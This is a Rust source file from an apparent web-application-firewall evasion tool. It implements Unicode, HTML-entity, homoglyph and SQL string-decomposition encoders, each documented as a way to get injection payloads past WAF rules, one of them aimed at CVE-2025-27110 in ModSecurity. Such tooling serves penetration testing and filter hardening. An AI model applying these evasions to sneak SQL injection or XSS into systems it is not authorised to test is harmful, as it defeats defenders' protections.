wafrift_encoding/encoding/
unicode.rs

1//! Unicode and HTML entity encoding strategies.
2use std::fmt::Write as _;
3
/// Escapes every character of `payload` as a `\uXXXX` sequence.
///
/// Characters above U+FFFF are written as a UTF-16 surrogate pair, i.e. two
/// consecutive `\uXXXX` escapes, which is the form JSON and JavaScript
/// decoders accept for supplementary-plane characters. Hex digits are
/// upper-case and zero-padded to four places.
///
/// **Context**: only useful when the receiving parser performs
/// JSON/JavaScript unescaping. On a raw HTTP parameter the target simply
/// receives the literal backslash-u text.
#[must_use]
pub fn unicode_encode(payload: &str) -> String {
    let mut encoded = String::with_capacity(payload.len() * 6);
    // Scratch space for the one or two UTF-16 code units of each character.
    let mut units = [0u16; 2];
    for ch in payload.chars() {
        for unit in ch.encode_utf16(&mut units).iter() {
            let _ = write!(&mut encoded, "\\u{unit:04X}");
        }
    }
    encoded
}
25
/// IIS/ASP-style percent-Unicode encoding: every character becomes `%uXXXX`.
///
/// The `%u` form carries exactly four hex digits, so it can only express
/// U+0000–U+FFFF directly. Characters outside that range are therefore
/// written as a UTF-16 surrogate pair (`%uD83D%uDE00` for U+1F600) rather
/// than as an over-long `%u1F600`, which would not be a well-formed `%u`
/// escape.
///
/// **Context**: intended for IIS / classic ASP parsers that understand
/// `%u` escapes.
#[must_use]
pub fn iis_unicode_encode(payload: &str) -> String {
    let mut encoded = String::with_capacity(payload.len() * 6);
    for ch in payload.chars() {
        match u32::from(ch) {
            bmp @ 0..=0xFFFF => {
                let _ = write!(&mut encoded, "%u{bmp:04X}");
            }
            astral => {
                // Split the 20-bit offset into lead/trail surrogate halves.
                // The low ten bits of both bases are zero, so OR equals ADD.
                let offset = astral - 0x1_0000;
                let lead = 0xD800 | (offset >> 10);
                let trail = 0xDC00 | (offset & 0x3FF);
                let _ = write!(&mut encoded, "%u{lead:04X}%u{trail:04X}");
            }
        }
    }
    encoded
}
51
/// Escapes `payload` so it can sit INSIDE a JSON string literal.
///
/// The result is the escaped interior only; no surrounding `"` quotes are
/// added. The output is meant to be substituted into an existing string
/// field (for example the value slot of `{"q": "..."}`), where extra quotes
/// would produce malformed JSON. Callers that need a standalone JSON string
/// literal wrap the result in `"` themselves.
///
/// What is escaped:
/// - `\` and `"` get a leading backslash;
/// - backspace, form feed, newline, carriage return and tab use the short
///   forms `\b`, `\f`, `\n`, `\r`, `\t`;
/// - every other character below U+0020 becomes `\u00XX` (upper-case hex).
///
/// All remaining characters, including `<`, `>` and non-ASCII text, are
/// copied through unchanged.
///
/// **Context**: inject inside an existing JSON string field whose backend
/// parser unescapes the sequence.
#[must_use]
pub fn json_string_encode(payload: &str) -> String {
    let mut escaped = String::with_capacity(payload.len() * 2);
    for ch in payload.chars() {
        // Characters with a dedicated two-character JSON escape.
        let short_form = match ch {
            '\\' => Some("\\\\"),
            '"' => Some("\\\""),
            '\u{0008}' => Some("\\b"),
            '\u{000C}' => Some("\\f"),
            '\n' => Some("\\n"),
            '\r' => Some("\\r"),
            '\t' => Some("\\t"),
            _ => None,
        };
        if let Some(seq) = short_form {
            escaped.push_str(seq);
        } else if ch < ' ' {
            // Remaining C0 controls have no short form.
            let _ = write!(&mut escaped, "\\u{:04X}", u32::from(ch));
        } else {
            escaped.push(ch);
        }
    }
    escaped
}
91
/// Hexadecimal HTML character references: every character of `payload`
/// becomes `&#xHH;`, with upper-case hex digits and no zero padding.
///
/// **Context**: only meaningful where the consumer decodes HTML entities
/// (e.g. a browser parsing HTML).
#[must_use]
pub fn html_entity_encode(payload: &str) -> String {
    payload
        .chars()
        .fold(String::with_capacity(payload.len() * 6), |mut acc, ch| {
            let _ = write!(acc, "&#x{:X};", u32::from(ch));
            acc
        })
}
103
/// Decimal HTML character references: every character of `payload` becomes
/// `&#DD;`, where `DD` is the code point in base 10 without padding.
///
/// **Context**: only meaningful where the consumer decodes HTML entities
/// (e.g. a browser parsing HTML).
#[must_use]
pub fn html_entity_decimal_encode(payload: &str) -> String {
    let mut encoded = String::with_capacity(payload.len() * 6);
    payload.chars().map(u32::from).for_each(|code| {
        let _ = write!(encoded, "&#{code};");
    });
    encoded
}
115
/// Numeric HTML character references padded with leading zeros.
///
/// Every character of `payload` becomes `&#x…;` (when `hex` is `true`,
/// upper-case hex digits) or `&#…;` (when `hex` is `false`, decimal), with
/// the number left-padded with `0` to at least `pad` digits.
///
/// # Parameters
/// - `pad`: minimum digit count. It is clamped to `1..=16`; `1` means no
///   padding, `4` gives `&#x003C;`, `6` gives `&#x00003C;`, `8` gives
///   `&#x0000003C;`. The upper bound keeps a caller-supplied width from
///   inflating the output without limit.
/// - `hex`: selects the radix as described above.
///
/// **Bypass mechanism**: targets CVE-2025-27110 (libmodsecurity3 v3.0.13),
/// where numeric character references containing leading zeros (`&#0060;`,
/// `&#x003C;`) are not decoded before rule inspection, so rules anchored on
/// the literal character do not fire. Fixed in libmodsecurity 3.0.14.
/// Advisory:
/// <https://modsecurity.org/20250225/html-entity-decoding-regression-cve-2025-27110-2025-february/>.
/// Probing several widths (4, 6, 8) is worthwhile because parsers differ in
/// how many leading zeros they tolerate.
#[must_use]
pub fn html_entity_zero_pad(payload: &str, pad: usize, hex: bool) -> String {
    let width = pad.clamp(1, 16);
    // Longest per-character framing is `&#x` + `;` = 4 bytes around the digits.
    let mut encoded = String::with_capacity(payload.len() * (width + 4));
    for code in payload.chars().map(u32::from) {
        let _ = if hex {
            write!(&mut encoded, "&#x{code:0>width$X};")
        } else {
            write!(&mut encoded, "&#{code:0>width$};")
        };
    }
    encoded
}
163
/// HTML numeric character references that rotate through four spellings.
///
/// The form used for each character depends on its position (character
/// index modulo 4):
///
/// | index % 4 | form        | notes                                   |
/// |-----------|-------------|-----------------------------------------|
/// | 0         | `&#xhh;`    | lower-case `x`, lower-case hex digits   |
/// | 1         | `&#XHH;`    | upper-case `X`, upper-case hex digits   |
/// | 2         | `&#DD;`     | decimal                                 |
/// | 3         | `&#000DD;`  | decimal prefixed with three zeros       |
///
/// For example `<s>/` encodes to `&#x3c;&#X73;&#62;&#00047;`.
///
/// The rotation is purely positional, so the same input always yields the
/// same output.
///
/// **Bypass mechanism**: a rule written against one canonical shape (for
/// instance a case-sensitive `&#x[0-9a-f]+;`) does not match the other
/// spellings, while HTML parsers that accept all four decode them to the
/// same characters.
///
/// **Context**: HTML body / attribute values.
#[must_use]
pub fn html_entity_variants(payload: &str) -> String {
    let mut encoded = String::with_capacity(payload.len() * 8);
    for (position, code) in payload.chars().map(u32::from).enumerate() {
        let _ = match position & 3 {
            0 => write!(&mut encoded, "&#x{code:x};"),
            1 => write!(&mut encoded, "&#X{code:X};"),
            2 => write!(&mut encoded, "&#{code};"),
            _ => write!(&mut encoded, "&#000{code};"),
        };
    }
    encoded
}
210
/// Swaps printable ASCII for its fullwidth look-alike.
///
/// - `!`–`~` (U+0021–U+007E) move to U+FF01–U+FF5E (a fixed offset of
///   `0xFEE0`).
/// - The ASCII space becomes the ideographic space U+3000.
/// - Every other character is copied unchanged.
///
/// **Bypass mechanism**: rules that match ASCII keywords (`SELECT`, `UNION`,
/// `<script>`, …) see different code points, while a backend that applies
/// Unicode NFKC normalisation folds the fullwidth forms back to ASCII.
///
/// **Context**: targets whose backend normalises Unicode before
/// interpreting the input.
#[must_use]
pub fn fullwidth_encode(payload: &str) -> String {
    let mut widened = String::with_capacity(payload.len() * 3);
    widened.extend(payload.chars().map(|ch| match ch {
        ' ' => '\u{3000}',
        '!'..='~' => char::from_u32(u32::from(ch) + 0xFEE0).unwrap_or(ch),
        other => other,
    }));
    widened
}
240
/// Replaces ASCII letters and digits with Mathematical Bold characters.
///
/// - `A`–`Z` → U+1D400–U+1D419
/// - `a`–`z` → U+1D41A–U+1D433
/// - `0`–`9` → U+1D7CE–U+1D7D7
///
/// Anything else (punctuation, whitespace, non-ASCII) is copied unchanged,
/// so the syntactic skeleton of a SQL/HTML payload stays intact.
///
/// **Bypass mechanism**: these code points NFKC-normalise to the plain
/// ASCII letter or digit. A backend that normalises before parsing sees the
/// original keyword; a filter matching ASCII bytes does not.
///
/// **Relation to `fullwidth_encode`**: same idea, different Unicode block
/// (U+1D400… instead of U+FF00…), which helps when a filter already covers
/// the fullwidth range.
///
/// **Context**: targets whose backend applies NFKC normalisation.
#[must_use]
pub fn math_bold_encode(payload: &str) -> String {
    // Moves `ch` to the same offset inside the run that starts at `base`.
    fn shift(ch: char, first: char, base: u32) -> char {
        char::from_u32(base + (u32::from(ch) - u32::from(first))).unwrap_or(ch)
    }

    let mut styled = String::with_capacity(payload.len() * 4);
    styled.extend(payload.chars().map(|ch| {
        if ch.is_ascii_uppercase() {
            shift(ch, 'A', 0x1D400)
        } else if ch.is_ascii_lowercase() {
            shift(ch, 'a', 0x1D41A)
        } else if ch.is_ascii_digit() {
            shift(ch, '0', 0x1D7CE)
        } else {
            ch
        }
    }));
    styled
}
282
/// Replaces ASCII letters with Mathematical Italic characters.
///
/// - `A`–`Z` → U+1D434–U+1D44D
/// - `a`–`z` → U+1D44E–U+1D467, except `h`
/// - `h` → U+210E (PLANCK CONSTANT): the slot where italic small h would
///   fall, U+1D455, is unassigned, so the letterlike symbol is used instead
///
/// Digits and all other characters are copied unchanged.
///
/// Same NFKC-based idea as `math_bold_encode`, using a different range for
/// filters that only cover the bold block.
///
/// Reference: <https://ibrahimsql.com/posts/waf-bypass-unicode>
#[must_use]
pub fn math_italic_encode(payload: &str) -> String {
    // Moves `ch` to the same offset inside the run that starts at `base`.
    fn shift(ch: char, first: char, base: u32) -> char {
        char::from_u32(base + (u32::from(ch) - u32::from(first))).unwrap_or(ch)
    }

    let mut styled = String::with_capacity(payload.len() * 4);
    for ch in payload.chars() {
        let glyph = if ch == 'h' {
            '\u{210E}'
        } else if ch.is_ascii_uppercase() {
            shift(ch, 'A', 0x1D434)
        } else if ch.is_ascii_lowercase() {
            shift(ch, 'a', 0x1D44E)
        } else {
            ch
        };
        styled.push(glyph);
    }
    styled
}
308
/// Replaces ASCII letters with Mathematical Script characters.
///
/// Regular mapping: `A`–`Z` → U+1D49C + offset, `a`–`z` → U+1D4B6 + offset.
///
/// Eleven letters are not taken from that range; they map to characters in
/// the Letterlike Symbols block instead (the corresponding slots in the
/// script range are unassigned):
///
/// | letter | replacement | | letter | replacement |
/// |--------|-------------|-|--------|-------------|
/// | `B`    | U+212C      | | `M`    | U+2133      |
/// | `E`    | U+2130      | | `R`    | U+211B      |
/// | `F`    | U+2131      | | `e`    | U+212F      |
/// | `H`    | U+210B      | | `g`    | U+210A      |
/// | `I`    | U+2110      | | `o`    | U+2134      |
/// | `L`    | U+2112      | |        |             |
///
/// Digits and all other characters are copied unchanged. The substitutes
/// are chosen so the encoded text stays NFKC-equivalent to the ASCII input.
#[must_use]
pub fn math_script_encode(payload: &str) -> String {
    // Letters whose script form lives in the Letterlike Symbols block.
    fn letterlike_script(ch: char) -> Option<char> {
        Some(match ch {
            'B' => '\u{212C}',
            'E' => '\u{2130}',
            'F' => '\u{2131}',
            'H' => '\u{210B}',
            'I' => '\u{2110}',
            'L' => '\u{2112}',
            'M' => '\u{2133}',
            'R' => '\u{211B}',
            'e' => '\u{212F}',
            'g' => '\u{210A}',
            'o' => '\u{2134}',
            _ => return None,
        })
    }

    // Moves `ch` to the same offset inside the run that starts at `base`.
    fn shift(ch: char, first: char, base: u32) -> char {
        char::from_u32(base + (u32::from(ch) - u32::from(first))).unwrap_or(ch)
    }

    let mut styled = String::with_capacity(payload.len() * 4);
    for ch in payload.chars() {
        let glyph = letterlike_script(ch).unwrap_or_else(|| {
            if ch.is_ascii_uppercase() {
                shift(ch, 'A', 0x1D49C)
            } else if ch.is_ascii_lowercase() {
                shift(ch, 'a', 0x1D4B6)
            } else {
                ch
            }
        });
        styled.push(glyph);
    }
    styled
}
339
/// Replaces ASCII letters with Mathematical Fraktur (blackletter)
/// characters.
///
/// Regular mapping: `A`–`Z` → U+1D504 + offset, `a`–`z` → U+1D51E + offset.
/// Five capitals are taken from the Letterlike Symbols block instead:
/// `C` → U+212D, `H` → U+210C, `I` → U+2111, `R` → U+211C, `Z` → U+2128.
///
/// Digits and all other characters are copied unchanged.
#[must_use]
pub fn math_fraktur_encode(payload: &str) -> String {
    // Moves `ch` to the same offset inside the run that starts at `base`.
    fn shift(ch: char, first: char, base: u32) -> char {
        char::from_u32(base + (u32::from(ch) - u32::from(first))).unwrap_or(ch)
    }

    payload
        .chars()
        .map(|ch| match ch {
            'C' => '\u{212D}',
            'H' => '\u{210C}',
            'I' => '\u{2111}',
            'R' => '\u{211C}',
            'Z' => '\u{2128}',
            _ if ch.is_ascii_uppercase() => shift(ch, 'A', 0x1D504),
            _ if ch.is_ascii_lowercase() => shift(ch, 'a', 0x1D51E),
            _ => ch,
        })
        .fold(String::with_capacity(payload.len() * 4), |mut acc, glyph| {
            acc.push(glyph);
            acc
        })
}
361
/// Replaces ASCII letters and digits with Mathematical Double-Struck
/// (blackboard bold) characters.
///
/// Regular mapping: `A`–`Z` → U+1D538 + offset, `a`–`z` → U+1D552 + offset,
/// `0`–`9` → U+1D7D8 + offset. Seven capitals are taken from the Letterlike
/// Symbols block instead: `C` → U+2102, `H` → U+210D, `N` → U+2115,
/// `P` → U+2119, `Q` → U+211A, `R` → U+211D, `Z` → U+2124.
///
/// All other characters are copied unchanged.
#[must_use]
pub fn math_double_struck_encode(payload: &str) -> String {
    // Moves `ch` to the same offset inside the run that starts at `base`.
    fn shift(ch: char, first: char, base: u32) -> char {
        char::from_u32(base + (u32::from(ch) - u32::from(first))).unwrap_or(ch)
    }

    let mut styled = String::with_capacity(payload.len() * 4);
    for ch in payload.chars() {
        let letterlike = match ch {
            'C' => Some('\u{2102}'),
            'H' => Some('\u{210D}'),
            'N' => Some('\u{2115}'),
            'P' => Some('\u{2119}'),
            'Q' => Some('\u{211A}'),
            'R' => Some('\u{211D}'),
            'Z' => Some('\u{2124}'),
            _ => None,
        };
        let glyph = match letterlike {
            Some(symbol) => symbol,
            None if ch.is_ascii_uppercase() => shift(ch, 'A', 0x1D538),
            None if ch.is_ascii_lowercase() => shift(ch, 'a', 0x1D552),
            None if ch.is_ascii_digit() => shift(ch, '0', 0x1D7D8),
            None => ch,
        };
        styled.push(glyph);
    }
    styled
}
387
/// Per-letter substitution using Letterlike Symbols and circled Latin
/// letters.
///
/// Each ASCII letter is replaced by a code point that NFKC-normalises back
/// to that letter:
///
/// - Letters with a dedicated entry use the Letterlike Symbols block
///   (U+2100–U+214F): script forms for `B E F H I L M` and `e g o`,
///   double-struck forms for `C N P Q R Z`, and KELVIN SIGN (U+212A) for
///   `K`.
/// - Every remaining letter falls back to its circled form:
///   `A`–`Z` → U+24B6 + offset, `a`–`z` → U+24D0 + offset.
///
/// Digits, punctuation and non-ASCII characters are copied unchanged.
///
/// Unlike the `math_*_encode` functions, which draw every letter from one
/// block, the output here mixes blocks letter by letter. A backend that
/// NFKC-normalises recovers the original keyword (e.g. `SELECT`); a filter
/// matching ASCII bytes sees unrelated code points.
#[must_use]
pub fn letterlike_encode(payload: &str) -> String {
    // Dedicated Letterlike Symbols replacement, when one is defined.
    fn symbol_for(ch: char) -> Option<char> {
        let symbol = match ch {
            'B' => '\u{212C}', // SCRIPT CAPITAL B
            'C' => '\u{2102}', // DOUBLE-STRUCK CAPITAL C
            'E' => '\u{2130}', // SCRIPT CAPITAL E
            'F' => '\u{2131}', // SCRIPT CAPITAL F
            'H' => '\u{210B}', // SCRIPT CAPITAL H
            'I' => '\u{2110}', // SCRIPT CAPITAL I
            'K' => '\u{212A}', // KELVIN SIGN
            'L' => '\u{2112}', // SCRIPT CAPITAL L
            'M' => '\u{2133}', // SCRIPT CAPITAL M
            'N' => '\u{2115}', // DOUBLE-STRUCK CAPITAL N
            'P' => '\u{2119}', // DOUBLE-STRUCK CAPITAL P
            'Q' => '\u{211A}', // DOUBLE-STRUCK CAPITAL Q
            'R' => '\u{211D}', // DOUBLE-STRUCK CAPITAL R
            'Z' => '\u{2124}', // DOUBLE-STRUCK CAPITAL Z
            'e' => '\u{212F}', // SCRIPT SMALL E
            'g' => '\u{210A}', // SCRIPT SMALL G
            'o' => '\u{2134}', // SCRIPT SMALL O
            _ => return None,
        };
        Some(symbol)
    }

    // Circled-Latin fallback for letters without a dedicated symbol.
    fn circled(ch: char) -> char {
        let (first, base) = if ch.is_ascii_uppercase() {
            ('A', 0x24B6)
        } else if ch.is_ascii_lowercase() {
            ('a', 0x24D0)
        } else {
            return ch;
        };
        char::from_u32(base + (u32::from(ch) - u32::from(first))).unwrap_or(ch)
    }

    let mut encoded = String::with_capacity(payload.len() * 4);
    encoded.extend(
        payload
            .chars()
            .map(|ch| symbol_for(ch).unwrap_or_else(|| circled(ch))),
    );
    encoded
}
435
/// SQL string-literal CONCAT splitter: rewrites every single-quoted string
/// literal in `payload` as `CONCAT('a','b',...)` with one character per
/// argument.
///
/// Input  `'admin'`  → output  `CONCAT('a','d','m','i','n')`
///
/// **Bypass mechanism**: blocklists that search for literal substrings
/// (`'admin'`, `'password'`, `'/etc/passwd'`, …) no longer find them because
/// the literal is decomposed into one-character strings; the database
/// reassembles the original value when it evaluates `CONCAT(...)`.
///
/// **Dialects**: relies on a variadic `CONCAT` (MySQL, MariaDB, PostgreSQL,
/// MSSQL). Oracle's two-argument `CONCAT` is not covered here.
///
/// **Edge cases**:
/// - An empty literal (`''`) becomes `CONCAT('')`.
/// - A doubled quote inside a literal is the SQL escape for one quote
///   character and is kept inside the literal: `'it''s'` becomes
///   `CONCAT('i','t','''','s')` (the quote is emitted as the one-character
///   literal `''''`).
/// - Backslash is NOT treated as an escape character: in `'O\'Brien'` the
///   literal ends at the quote that follows the backslash.
/// - An opening quote with no closing quote: the rest of the payload, from
///   that quote on, is copied through unchanged.
/// - Text outside single quotes (including double-quoted identifiers) is
///   left alone.
///
/// **Context**: SQL injection payloads containing string literals.
#[must_use]
pub fn sql_concat_split(payload: &str) -> String {
    // Scans the text that follows an opening quote. Returns the literal's
    // content (doubled quotes collapsed to one) together with the number of
    // bytes consumed including the closing quote, or `None` when the literal
    // is never closed.
    fn read_literal(after_open: &str) -> Option<(String, usize)> {
        let mut content = String::new();
        let mut scan = after_open.char_indices().peekable();
        while let Some((idx, c)) = scan.next() {
            if c != '\'' {
                content.push(c);
            } else if matches!(scan.peek(), Some(&(_, '\''))) {
                // `''` inside a literal stands for a single quote character.
                scan.next();
                content.push('\'');
            } else {
                return Some((content, idx + 1));
            }
        }
        None
    }

    let mut out = String::with_capacity(payload.len() * 4);
    let mut rest = payload;
    while let Some(open) = rest.find('\'') {
        out.push_str(&rest[..open]);
        let after_open = &rest[open + 1..];
        match read_literal(after_open) {
            None => {
                // Unbalanced quote: keep the raw remainder byte-for-byte.
                out.push_str(&rest[open..]);
                return out;
            }
            Some((literal, consumed)) => {
                out.push_str("CONCAT(");
                if literal.is_empty() {
                    out.push_str("''");
                }
                for (position, c) in literal.chars().enumerate() {
                    if position > 0 {
                        out.push(',');
                    }
                    if c == '\'' {
                        // A lone quote must itself be doubled inside quotes.
                        out.push_str("''''");
                    } else {
                        out.push('\'');
                        out.push(c);
                        out.push('\'');
                    }
                }
                out.push(')');
                rest = &after_open[consumed..];
            }
        }
    }
    out.push_str(rest);
    out
}
516
/// SQL `CHAR()` decomposition: rewrites every single-quoted string literal
/// in `payload` as `CHAR(N1,N2,...)` with one code point per argument.
///
/// Input  `'admin'`  → output  `CHAR(97,100,109,105,110)`
///
/// **Bypass mechanism**: unlike `sql_concat_split`, the output contains no
/// quoted text at all, so rules keyed on string-literal patterns or on
/// `CONCAT(...)` shapes have nothing to match.
///
/// **Dialects**: variadic `CHAR()` as provided by MySQL, MariaDB and MSSQL.
/// PostgreSQL / Oracle use the unary `CHR()` instead.
///
/// **Edge cases**:
/// - An empty literal (`''`) is emitted unchanged as `''`. A zero-argument
///   `CHAR()` would not be an empty string, which would change the meaning
///   of payloads such as `pass='' OR 1=1`.
/// - A doubled quote inside a literal is the SQL escape for one quote
///   character and is kept inside the literal: `'it''s'` becomes
///   `CHAR(105,116,39,115)`.
/// - Backslash is not treated as an escape character.
/// - Each `char` yields one argument holding its Unicode code point; for
///   values above 255 the database's `CHAR()` may not reproduce the original
///   character exactly.
/// - An opening quote with no closing quote: the rest of the payload, from
///   that quote on, is copied through unchanged.
///
/// **Context**: SQL injection payloads whose string literals are
/// blocklisted.
#[must_use]
pub fn sql_char_decompose(payload: &str) -> String {
    // Scans the text that follows an opening quote. Returns the literal's
    // content (doubled quotes collapsed to one) together with the number of
    // bytes consumed including the closing quote, or `None` when the literal
    // is never closed.
    fn read_literal(after_open: &str) -> Option<(String, usize)> {
        let mut content = String::new();
        let mut scan = after_open.char_indices().peekable();
        while let Some((idx, c)) = scan.next() {
            if c != '\'' {
                content.push(c);
            } else if matches!(scan.peek(), Some(&(_, '\''))) {
                // `''` inside a literal stands for a single quote character.
                scan.next();
                content.push('\'');
            } else {
                return Some((content, idx + 1));
            }
        }
        None
    }

    let mut out = String::with_capacity(payload.len() * 5);
    let mut rest = payload;
    while let Some(open) = rest.find('\'') {
        out.push_str(&rest[..open]);
        let after_open = &rest[open + 1..];
        match read_literal(after_open) {
            None => {
                // Unbalanced quote: keep the raw remainder byte-for-byte.
                out.push_str(&rest[open..]);
                return out;
            }
            Some((literal, consumed)) => {
                if literal.is_empty() {
                    // Preserve the empty-string identity (see doc comment).
                    out.push_str("''");
                } else {
                    out.push_str("CHAR(");
                    for (position, c) in literal.chars().enumerate() {
                        if position > 0 {
                            out.push(',');
                        }
                        let _ = write!(&mut out, "{}", u32::from(c));
                    }
                    out.push(')');
                }
                rest = &after_open[consumed..];
            }
        }
    }
    out.push_str(rest);
    out
}
599
/// PostgreSQL / Oracle `CHR()` decomposition: rewrites every single-quoted
/// string literal in `payload` as `(CHR(N)||CHR(N)||...)`, one `CHR()` call
/// per character.
///
/// Input  `'admin'`  →  output  `(CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))`
///
/// `CHR()` takes a single argument, so the per-character calls are joined
/// with the `||` concatenation operator; the surrounding parentheses keep
/// the expression intact inside a larger one (`WHERE u = ...`). This is the
/// counterpart of `sql_char_decompose`, which targets the variadic
/// `CHAR(N1,N2,...)`.
///
/// Each argument is the character's Unicode code point. For ASCII payloads
/// (the common case) PostgreSQL and Oracle agree on the result; for larger
/// values the outcome depends on the database character set.
///
/// **Edge cases**:
/// - An empty literal (`''`) becomes `('')`.
/// - A doubled quote inside a literal is the SQL escape for one quote
///   character and is kept inside the literal: `'it''s'` becomes
///   `(CHR(105)||CHR(116)||CHR(39)||CHR(115))`.
/// - Backslash is not treated as an escape character.
/// - An opening quote with no closing quote: the rest of the payload, from
///   that quote on, is copied through unchanged.
#[must_use]
pub fn pg_chr_decompose(payload: &str) -> String {
    // Scans the text that follows an opening quote. Returns the literal's
    // content (doubled quotes collapsed to one) together with the number of
    // bytes consumed including the closing quote, or `None` when the literal
    // is never closed.
    fn read_literal(after_open: &str) -> Option<(String, usize)> {
        let mut content = String::new();
        let mut scan = after_open.char_indices().peekable();
        while let Some((idx, c)) = scan.next() {
            if c != '\'' {
                content.push(c);
            } else if matches!(scan.peek(), Some(&(_, '\''))) {
                // `''` inside a literal stands for a single quote character.
                scan.next();
                content.push('\'');
            } else {
                return Some((content, idx + 1));
            }
        }
        None
    }

    let mut out = String::with_capacity(payload.len() * 7);
    let mut rest = payload;
    while let Some(open) = rest.find('\'') {
        out.push_str(&rest[..open]);
        let after_open = &rest[open + 1..];
        match read_literal(after_open) {
            None => {
                // Unbalanced quote: keep the raw remainder byte-for-byte.
                out.push_str(&rest[open..]);
                return out;
            }
            Some((literal, consumed)) => {
                out.push('(');
                if literal.is_empty() {
                    out.push_str("''");
                }
                for (position, c) in literal.chars().enumerate() {
                    if position > 0 {
                        out.push_str("||");
                    }
                    let _ = write!(&mut out, "CHR({})", u32::from(c));
                }
                out.push(')');
                rest = &after_open[consumed..];
            }
        }
    }
    out.push_str(rest);
    out
}
658
/// Partial JSON Unicode escape: ASCII letters and digits become `\uXXXX`;
/// everything else (quotes, operators, whitespace, non-ASCII text) is
/// copied unchanged.
///
/// **Bypass mechanism**: keyword rules (UNION, SELECT, alert, script, …)
/// match on the raw bytes. With every letter written as an escape, the wire
/// bytes contain `\u0055\u004E\u0049\u004F\u004E` rather than `UNION`, while
/// a JSON parser or JS engine at the origin turns the escapes back into the
/// keyword. Compared with [`unicode_encode`], which escapes every
/// character, the punctuation skeleton stays visible here, so the payload
/// has a lower density of `\u` sequences.
///
/// **Already-escaped input**: a backslash followed by `u` and four ASCII hex
/// digits is recognised as an existing escape and copied verbatim, so
/// running the function on its own output does not escape it a second time.
///
/// **Context**: only useful when the target performs JSON/JavaScript-style
/// Unicode unescaping; against raw HTTP parameters the literal backslash-u
/// text is delivered as-is.
#[must_use]
pub fn json_unicode_alnum(payload: &str) -> String {
    // True when `bytes` begins with a six-byte `\uXXXX` escape. All six
    // bytes are ASCII, so byte offset 6 is always a char boundary.
    fn starts_with_escape(bytes: &[u8]) -> bool {
        bytes.len() >= 6
            && bytes[0] == b'\\'
            && bytes[1] == b'u'
            && bytes[2..6].iter().all(u8::is_ascii_hexdigit)
    }

    let mut out = String::with_capacity(payload.len() * 6);
    let mut rest = payload;
    while let Some(ch) = rest.chars().next() {
        if starts_with_escape(rest.as_bytes()) {
            let (escape, tail) = rest.split_at(6);
            out.push_str(escape);
            rest = tail;
            continue;
        }
        if ch.is_ascii_alphanumeric() {
            let _ = write!(&mut out, "\\u{:04X}", u32::from(ch));
        } else {
            out.push(ch);
        }
        rest = &rest[ch.len_utf8()..];
    }
    out
}
728
/// Escape every character of `payload` as a JSON `\uXXXX` sequence.
///
/// Nothing is left bare: punctuation, whitespace and control characters
/// are escaped as well, whereas `json_unicode_alnum` only rewrites ASCII
/// alphanumerics. Reach for this variant when the characters surrounding
/// a keyword must be hidden too.
///
/// * A run of the input that already spells `\uXXXX` (backslash, `u`,
///   four ASCII hex digits) is copied through unchanged instead of being
///   escaped a second time.
/// * Code points above U+FFFF are written as a UTF-16 surrogate pair.
/// * Hex digits are emitted in uppercase.
#[must_use]
pub fn json_unicode_full(payload: &str) -> String {
    let mut out = String::with_capacity(payload.len() * 6);
    // `rest` is the still-unprocessed suffix; it always starts on a char
    // boundary because we only ever advance by whole characters or by a
    // six-byte all-ASCII escape.
    let mut rest = payload;
    while let Some(ch) = rest.chars().next() {
        let already_escaped = matches!(
            rest.as_bytes(),
            [b'\\', b'u', h0, h1, h2, h3, ..]
                if [h0, h1, h2, h3].iter().all(|h| h.is_ascii_hexdigit())
        );
        if already_escaped {
            // Six ASCII bytes, so splitting at 6 cannot land mid-character.
            let (escape, tail) = rest.split_at(6);
            out.push_str(escape);
            rest = tail;
            continue;
        }
        rest = &rest[ch.len_utf8()..];
        match u32::from(ch) {
            unit @ 0..=0xFFFF => {
                let _ = write!(&mut out, "\\u{unit:04X}");
            }
            scalar => {
                // Supplementary plane: split into high/low surrogates.
                let offset = scalar - 0x1_0000;
                let high = 0xD800 + (offset >> 10);
                let low = 0xDC00 + (offset & 0x3FF);
                let _ = write!(&mut out, "\\u{high:04X}\\u{low:04X}");
            }
        }
    }
    out
}
774
/// Escape every character of `payload` as a `\uXXXX`-style sequence whose
/// marker letter and hex-digit case vary with the character's position.
///
/// For BMP characters the form is chosen by `index % 4`:
///
/// | index % 4 | marker | hex digits |
/// |-----------|--------|------------|
/// | 0         | `\u`   | lowercase  |
/// | 1         | `\U`   | uppercase  |
/// | 2         | `\u`   | uppercase  |
/// | 3         | `\U`   | lowercase  |
///
/// Characters above U+FFFF become a surrogate pair. At an even index the
/// pair is `\u` + lowercase hex followed by `\U` + uppercase hex; at an
/// odd index the two halves swap forms.
///
/// The intent is to slip past case-sensitive patterns such as
/// `\u[0-9A-F]{4}`. RFC 8259 defines only the lowercase `\u` marker, so
/// whether a given backend decodes the `\U` forms must be verified per
/// target.
#[must_use]
pub fn json_unicode_mixed_case(payload: &str) -> String {
    // Append one escape unit: backslash, marker letter, four hex digits.
    fn push_unit(out: &mut String, marker: char, upper_hex: bool, unit: u32) {
        let _ = if upper_hex {
            write!(out, "\\{marker}{unit:04X}")
        } else {
            write!(out, "\\{marker}{unit:04x}")
        };
    }

    let mut out = String::with_capacity(payload.len() * 6);
    for (idx, ch) in payload.chars().enumerate() {
        let scalar = u32::from(ch);
        if scalar <= 0xFFFF {
            let (marker, upper_hex) = match idx % 4 {
                0 => ('u', false),
                1 => ('U', true),
                2 => ('u', true),
                _ => ('U', false),
            };
            push_unit(&mut out, marker, upper_hex, scalar);
            continue;
        }
        // Supplementary plane: two units, each in a different form.
        let offset = scalar - 0x1_0000;
        let high = 0xD800 + (offset >> 10);
        let low = 0xDC00 + (offset & 0x3FF);
        if idx % 2 == 0 {
            push_unit(&mut out, 'u', false, high);
            push_unit(&mut out, 'U', true, low);
        } else {
            push_unit(&mut out, 'U', true, high);
            push_unit(&mut out, 'u', false, low);
        }
    }
    out
}
809
/// SQL adjacent-string-literal concatenation — every terminated `'…'`
/// literal is rewritten as a run of single-character literals separated
/// by one space: `'admin'` → `'a' 'd' 'm' 'i' 'n'`.
///
/// **Bypass mechanism**: standard SQL lets a parser concatenate adjacent
/// character-string literals, so the database reassembles the original
/// value while a byte-pattern WAF rule looking for `'admin'` or
/// `'/etc/passwd'` sees only unrelated one-character strings. Dialects
/// differ in whether and how they honour this (some require a newline
/// between the segments) — verify against the target database.
///
/// **Parsing rules**
/// * Text outside single quotes is copied unchanged.
/// * Inside a literal, `''` is the SQL escape for one `'`; the character
///   is re-emitted as its own literal in the four-quote form `''''`.
/// * Empty (`''`) and one-character literals come out unchanged.
